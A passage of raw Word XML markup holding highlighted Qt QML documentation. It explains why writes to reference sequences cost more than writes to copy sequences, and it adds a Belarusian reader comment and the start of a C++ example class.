          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>two different implementations for sequence</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> types: one for where the sequence is a</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId631" w:anchor="Q_PROPERTY" w:history="1">
        <w:r w:rsidRPr="000768F5">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Q_PROPERTY</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>of a</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId632" w:history="1">
        <w:r w:rsidRPr="005D1E34">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QObject</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">(we'll call this a </w:t>
      </w:r>
      <w:r w:rsidRPr="000768F5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>reference sequence</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">), and another for where the sequence is </w:t>
      </w:r>
      <w:r w:rsidRPr="00E458AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>returned from a</w:t>
      </w:r>
      <w:r w:rsidRPr="00E458AC">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId633" w:anchor="Q_INVOKABLE" w:history="1">
        <w:r w:rsidRPr="00E458AC">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Q_INVOKABLE</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>function of a</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId634" w:history="1">
        <w:r w:rsidRPr="005D1E34">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QObject</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">(we'll call this a </w:t>
      </w:r>
      <w:r w:rsidRPr="000768F5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>copy sequence</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>).</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A </w:t>
      </w:r>
      <w:r w:rsidRPr="000768F5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>reference sequence</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> is read and written via</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId635" w:anchor="property" w:history="1">
        <w:r w:rsidRPr="000768F5">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QMetaObject::property</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="000768F5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and thus is read and written as a</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId636" w:history="1">
        <w:r w:rsidRPr="000768F5">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QVariant</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. This means that </w:t>
      </w:r>
      <w:r w:rsidRPr="000768F5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>changing the value of any element in the sequence from JavaScript will result in three steps occurring: the complete sequence will be read from the</w:t>
      </w:r>
      <w:r w:rsidRPr="000768F5">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId637" w:history="1">
        <w:r w:rsidRPr="000768F5">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QObject</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="000768F5">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="000768F5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(as a</w:t>
      </w:r>
      <w:r w:rsidRPr="000768F5">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId638" w:history="1">
        <w:r w:rsidRPr="000768F5">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QVariant</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="000768F5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, but then cast to a sequence of the correct type); the element at the specified index will be changed in that sequence; and the complete sequence will be written back to the</w:t>
      </w:r>
      <w:r w:rsidRPr="000768F5">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId639" w:history="1">
        <w:r w:rsidRPr="000768F5">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QObject</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="000768F5">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="000768F5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(as a</w:t>
      </w:r>
      <w:r w:rsidRPr="000768F5">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId640" w:history="1">
        <w:r w:rsidRPr="000768F5">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QVariant</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="000768F5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>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0768F5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>A copy sequence is far simpler as the actual sequence is stored in the JavaScript object's resource data, so no read/modify/write cycle occurs (instead, the resource data is modified directly).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="000768F5" w:rsidRDefault="005D1E34" w:rsidP="005D1E34">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Therefore, </w:t>
      </w:r>
      <w:r w:rsidRPr="000768F5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>writes to elements of a reference sequence will be much slower than writes to elements of a copy sequence</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. In fact, writing to a single element of an N-element reference sequence is equivalent in cost to assigning a N-element copy sequence to that reference sequence, so </w:t>
      </w:r>
      <w:r w:rsidRPr="000768F5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>you're usually better off modifying a temporary copy sequence and then assigning the result to a reference sequence, during computation</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="000768F5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E458AC" w:rsidRPr="00E458AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidR="00E458AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> г</w:t>
      </w:r>
      <w:r w:rsidR="000768F5" w:rsidRPr="00E458AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">эта недахоп </w:t>
      </w:r>
      <w:r w:rsidR="000768F5" w:rsidRPr="00E458AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>qml</w:t>
      </w:r>
      <w:r w:rsidR="000768F5" w:rsidRPr="00E458AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> і значны момант па аптымізацыі кода…</w:t>
      </w:r>
      <w:r w:rsidR="00E458AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E458AC" w:rsidRPr="00E458AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:lang w:val="be-BY"/>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Assume the existence (and prior registration into the "Qt.example 1.0" namespace) of the following C++ type:</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class</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SequenceTypeExample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public</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QQuickItem</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Q_OBJECT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="00906D8E" w:rsidRDefault="005D1E34" w:rsidP="005D1E34">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00906D8E">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00906D8E">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Q_PROPERTY </w:t>
      </w:r>
      <w:r w:rsidRPr="00906D8E">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00906D8E">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QList</w:t>
      </w:r>
      <w:r w:rsidRPr="00906D8E">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;qreal&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00906D8E">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> qrealListProperty READ qrealListProperty WRITE setQrealListProperty NOTIFY qrealListPropertyChanged</w:t>
      </w:r>
      <w:r w:rsidRPr="00906D8E">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>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public</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SequenceTypeExample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QQuickItem</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m_list </w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;&lt;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1.1</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&lt;&lt;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2.2</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&lt;&lt;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3.3</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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SequenceTypeExample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QList</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;qreal&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> qrealListProperty</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const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return</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> m_list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void</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> setQrealListProperty</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>const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QList</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;qreal&gt;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&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
